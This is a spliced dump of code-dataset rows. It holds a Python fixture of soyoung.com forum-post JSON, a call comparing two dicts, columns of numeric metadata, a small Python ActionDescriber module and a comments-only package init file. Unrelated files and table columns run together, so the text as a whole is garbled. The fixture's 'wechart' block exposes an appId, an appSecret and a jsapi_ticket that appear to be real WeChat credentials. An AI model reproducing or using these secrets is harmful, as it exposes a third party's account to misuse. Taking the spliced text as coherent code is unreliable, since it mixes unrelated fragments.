"level": "7",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img2.soyoung.com\/upload\/20180724\/8\/dfea7a3c724a1bb74939fedf1a3ebce9_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 20:03:04",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": ":yp0 ook",
"post_id": "18549064",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 15:13:03",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "哦民工",
"post_id": "18549035",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 14:30:38",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "不能这样子搞吧",
"post_id": "18549026",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 14:28:13",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "可以可以",
"post_id": "18549025",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 14:27:15",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "可怜天下父母心",
"post_id": "18549023",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 11:56:02",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "啦啦啦模样可爱啦、在线等方面取得重大",
"post_id": "18549008",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 11:49:18",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "你们要去吃早餐没有!\n一个人一开始的地方是\n斤斤计较是因为别人对自己好点不过现在还是有点\n啦啦啦队长是一位",
"post_id": "18549007",
"images": [
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/6\/dd1b0ee4775ff529c0af7c1352ca9cbc.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/6\/dd1b0ee4775ff529c0af7c1352ca9cbc_600_300.jpg"
},
{
"w": 750,
"h": 1000,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/0\/028f4e858e140fbc57e3d1e9c1f39ed6.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/0\/028f4e858e140fbc57e3d1e9c1f39ed6_600_300.jpg"
},
{
"w": 750,
"h": 1000,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/7\/681879243cf634495896c2ebf54506c7.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180830\/7\/681879243cf634495896c2ebf54506c7_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 11:48:58",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "你好",
"post_id": "18549006",
"images": [
{
"w": 545,
"h": 1026,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/4\/86c270aa0748fb52654949b6da0b2639.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/4\/86c270aa0748fb52654949b6da0b2639_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 11:48:17",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "你好<img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face8.png' \/><img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face8.png' \/><img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face8.png' \/>你好",
"post_id": "18549005",
"images": [
{
"w": 750,
"h": 1000,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/6\/6e52174f3e1f02c0b8b2f30b9f62f34f.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/6\/6e52174f3e1f02c0b8b2f30b9f62f34f_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 11:45:43",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "我是谁\n你好意思说我吗",
"post_id": "18549003",
"images": [
{
"w": 545,
"h": 1026,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/6\/86c270aa0748fb52654949b6da0b2639.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180830\/6\/86c270aa0748fb52654949b6da0b2639_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-29 20:19:54",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "发布",
"post_id": "18548969",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "1",
"create_date": "2018-08-29 20:15:40",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "你好",
"post_id": "18548968",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "1",
"create_date": "2018-08-29 20:15:18",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "回答",
"post_id": "18548967",
"images": [
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/9\/7cb82bf0d97e92382945cdcf2255f4c4.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/9\/7cb82bf0d97e92382945cdcf2255f4c4_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/0\/555b0888f5105fe9049219c21f96d287.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/0\/555b0888f5105fe9049219c21f96d287_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/87589b1e1c93ffe6d20d6a74e7d8ded5.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/87589b1e1c93ffe6d20d6a74e7d8ded5_600_300.jpg"
},
{
"w": 1070,
"h": 1918,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/1\/7f027ad38c845ccb21e4add18aa154a1.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/1\/7f027ad38c845ccb21e4add18aa154a1_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/1\/88b90057516f1cf88aa959792bbdeb96.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/1\/88b90057516f1cf88aa959792bbdeb96_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/3\/611881b16417cdef8eb379ee7727607a.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/3\/611881b16417cdef8eb379ee7727607a_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/5\/fd7953339571d470c4e8d11b2c3d9d00.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/5\/fd7953339571d470c4e8d11b2c3d9d00_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/862ddba6a516634d3d2a414521883e75.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/862ddba6a516634d3d2a414521883e75_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/0\/d98bb19e1a9140eab72322b86c81c688.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/0\/d98bb19e1a9140eab72322b86c81c688_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {
"duration": "00:04",
"url": "http:\/\/videosy.soyoung.com\/4582b4a579e45c3138fbe8c63d7d5b14.mp4"
},
"video_cover": {
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180829\/4\/1879a13fb42bc8baeaa443c31fa57fe2.jpg",
"w": "",
"h": ""
},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-29 20:14:16",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "回答回答回答回答",
"post_id": "18548966",
"images": [
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/3\/87589b1e1c93ffe6d20d6a74e7d8ded5.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/3\/87589b1e1c93ffe6d20d6a74e7d8ded5_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/555b0888f5105fe9049219c21f96d287.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/555b0888f5105fe9049219c21f96d287_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/4\/7cb82bf0d97e92382945cdcf2255f4c4.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/4\/7cb82bf0d97e92382945cdcf2255f4c4_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/6\/d2cb9ac9eab211857b4f57ddfe6c6eb1.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/6\/d2cb9ac9eab211857b4f57ddfe6c6eb1_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/0c0a89e96433e766f76044d8d79aea52.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/0c0a89e96433e766f76044d8d79aea52_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/2\/d98bb19e1a9140eab72322b86c81c688.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/2\/d98bb19e1a9140eab72322b86c81c688_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/862ddba6a516634d3d2a414521883e75.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/862ddba6a516634d3d2a414521883e75_600_300.jpg"
},
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/5\/fd7953339571d470c4e8d11b2c3d9d00.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/5\/fd7953339571d470c4e8d11b2c3d9d00_600_300.jpg"
},
{
"w": 1070,
"h": 1918,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/2\/7f027ad38c845ccb21e4add18aa154a1.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/2\/7f027ad38c845ccb21e4add18aa154a1_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-29 20:07:33",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "123456",
"post_id": "18548965",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-29 20:06:53",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "我是谁我是谁\n",
"post_id": "18548963",
"images": [
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/4\/7cb82bf0d97e92382945cdcf2255f4c4.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/4\/7cb82bf0d97e92382945cdcf2255f4c4_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-29 20:06:15",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "jdjjdjdj",
"post_id": "18548962",
"images": [
{
"w": 1080,
"h": 1920,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/7cb82bf0d97e92382945cdcf2255f4c4.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/android\/20180829\/8\/7cb82bf0d97e92382945cdcf2255f4c4_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "3",
"create_date": "2018-08-29 14:06:09",
"create_date_str": "8月29日",
"up_cnt": "0",
"content": "Uusuhhsgi\n Usushh 😍😜😛😉😉😙",
"post_id": "18548876",
"images": [
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/6\/5fc7fea990d90a2435f01dc5ec5e6cac.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/6\/5fc7fea990d90a2435f01dc5ec5e6cac_600_300.jpg"
},
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/0\/b29c82e222abda4d3d648b8256cb8d89.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/0\/b29c82e222abda4d3d648b8256cb8d89_600_300.jpg"
},
{
"w": 774,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/6\/551e6f2089c56584612b36fbc1c20532.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/6\/551e6f2089c56584612b36fbc1c20532_600_300.jpg"
},
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/1\/6e90efec1c04e90404ae1508d0e962cb.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/1\/6e90efec1c04e90404ae1508d0e962cb_600_300.jpg"
},
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/3\/2398640d1a5a432be8eda2497c09af81.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/3\/2398640d1a5a432be8eda2497c09af81_600_300.jpg"
},
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/1\/9ced9e78d92947fde662e219757e9a95.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/1\/9ced9e78d92947fde662e219757e9a95_600_300.jpg"
},
{
"w": 828,
"h": 1104,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/5\/3b86522846cc2445ff594e62604c1f6c.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/5\/3b86522846cc2445ff594e62604c1f6c_600_300.jpg"
},
{
"w": 828,
"h": 1104,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/7\/e34ec67d3ef3ba20f61d337ae74c33d3.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/7\/e34ec67d3ef3ba20f61d337ae74c33d3_600_300.jpg"
},
{
"w": 720,
"h": 1280,
"u_y": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/5\/6104f68d787517aca6b33d8be33b47f0.jpg",
"u": "http:\/\/img2.soyoung.com\/tieba\/ios\/20180829\/5\/6104f68d787517aca6b33d8be33b47f0_600_300.jpg"
}
],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
}
],
"wechart": {
"appId": "wx36c4e0e929eafddd",
"nonceStr": "3ZY97sfTdedsdsRd",
"timestamp": 1536568125,
"appSecret": "37a25d9cdf99e57e3f6d66a460e36809",
"url": "http:\/\/devscm.sy.soyoung.com\/post\/question\/?question_id=1&_json=1",
"signature": "195fa03919cefa120747c5cafbd59a1b13b99387",
"rawString": "jsapi_ticket=bxLdikRXVbTPdHSM05e5u7Q0Ge8fUmkokte-xRvf2xgTQoBWl_4VX7l2Z3G0TpDy8M3sCXZFxURShCGjxHBK_A&noncestr=3ZY97sfTdedsdsRd×tamp=1536568125&url=http:\/\/devscm.sy.soyoung.com\/post\/question\/?question_id=1&_json=1"
},
"share": {
"share_title": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好",
"share_content": ">>>><<<<馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢",
"share_img": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e_600_300.jpg",
"url": "https:\/\/m.sy.soyoung.com\/post\/question?question_id=1"
}
}
}
# Compare the two large JSON-like dict fixtures and report the result.
# NOTE(review): compare_json_construction and d1 are defined earlier in the
# file (outside this view); presumably it diffs structure/keys rather than
# values — confirm against its definition before relying on the output.
res = compare_json_construction(d1, d2)
print(res)
| 44.225063
| 472
| 0.38799
| 6,644
| 88,229
| 4.96764
| 0.05298
| 0.072716
| 0.079079
| 0.094895
| 0.985729
| 0.985729
| 0.985729
| 0.984396
| 0.984396
| 0.984396
| 0
| 0.208716
| 0.455927
| 88,229
| 1,994
| 473
| 44.247242
| 0.478553
| 0.00229
| 0
| 0.810178
| 0
| 0.008142
| 0.42483
| 0.266708
| 0
| 0
| 0
| 0
| 0.001527
| 1
| 0.000509
| false
| 0
| 0
| 0
| 0.002036
| 0.001018
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
aca63a285f65dc2a5428dbcdb450af3d0b0fa72c
| 1,478
|
py
|
Python
|
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Sequence
from src.data.action import Action
class ActionDescriber(ABC):
    """Interface for rendering human-readable summaries of a sequence of actions."""

    @abstractmethod
    def describe(self, actions: Sequence[Action]) -> str:
        """Return a single string describing every action."""

    @abstractmethod
    def describe_applied(self, actions: Sequence[Action]) -> str:
        """Return a single string describing only the successfully applied actions."""

    @abstractmethod
    def describe_failed(self, actions: Sequence[Action]) -> str:
        """Return a single string describing only the failed actions (with reasons)."""
class BriefActionDescriber(ActionDescriber):
    """Renders actions as a single comma-separated line.

    Note: the joins below return a plain ``str``; the previous
    ``Sequence[str]`` return annotations were incorrect.
    """

    def describe(self, actions: Sequence[Action]) -> str:
        """Return every action's short description, comma-separated."""
        return ", ".join(a.description for a in actions)

    def describe_applied(self, actions: Sequence[Action]) -> str:
        """Return short descriptions of successfully applied actions only."""
        return ", ".join(a.description for a in actions if a.is_applied())

    def describe_failed(self, actions: Sequence[Action]) -> str:
        """Return short descriptions of failed actions, each with its failure reason."""
        return ", ".join(f"{a.description} ({a.reason})" for a in actions if a.has_failed())
class DetailedActionDescriber(ActionDescriber):
    """Renders actions as newline-separated detailed descriptions.

    Note: the joins below return a plain ``str``; the previous
    ``Sequence[str]`` return annotations were incorrect.
    """

    def describe(self, actions: Sequence[Action]) -> str:
        """Return every action's detailed description, newline-separated."""
        return "\n".join(a.detailed_description for a in actions)

    def describe_applied(self, actions: Sequence[Action]) -> str:
        """Return detailed descriptions of successfully applied actions only."""
        return "\n".join(a.detailed_description for a in actions if a.is_applied())

    def describe_failed(self, actions: Sequence[Action]) -> str:
        """Return detailed descriptions of failed actions, each followed by its error."""
        return "\n".join(f"{a.detailed_description}\nerror: {a.reason}" for a in actions if a.has_failed())
| 36.04878
| 107
| 0.685386
| 182
| 1,478
| 5.494505
| 0.186813
| 0.099
| 0.171
| 0.225
| 0.787
| 0.787
| 0.787
| 0.787
| 0.772
| 0.596
| 0
| 0
| 0.17659
| 1,478
| 40
| 108
| 36.95
| 0.821693
| 0
| 0
| 0.5
| 0
| 0
| 0.056849
| 0.021918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0.125
| 0.25
| 0.875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
acab9832d366b57286f6e462082f3237a579b009
| 82
|
py
|
Python
|
src/chapter31/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter31/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter31/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter31/chapter31note.py
# python3 src/chapter31/chapter31note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
